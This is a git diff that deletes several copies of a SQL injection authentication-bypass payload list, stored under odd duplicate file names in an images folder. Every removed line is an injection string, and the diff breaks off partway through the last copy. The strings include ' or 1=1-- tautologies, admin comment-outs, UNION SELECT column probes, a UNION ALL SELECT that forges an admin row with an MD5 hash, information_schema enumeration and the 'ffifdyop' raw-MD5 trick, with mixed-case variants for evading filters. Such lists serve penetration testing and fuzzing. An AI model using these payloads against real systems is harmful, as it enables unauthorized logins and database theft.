-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
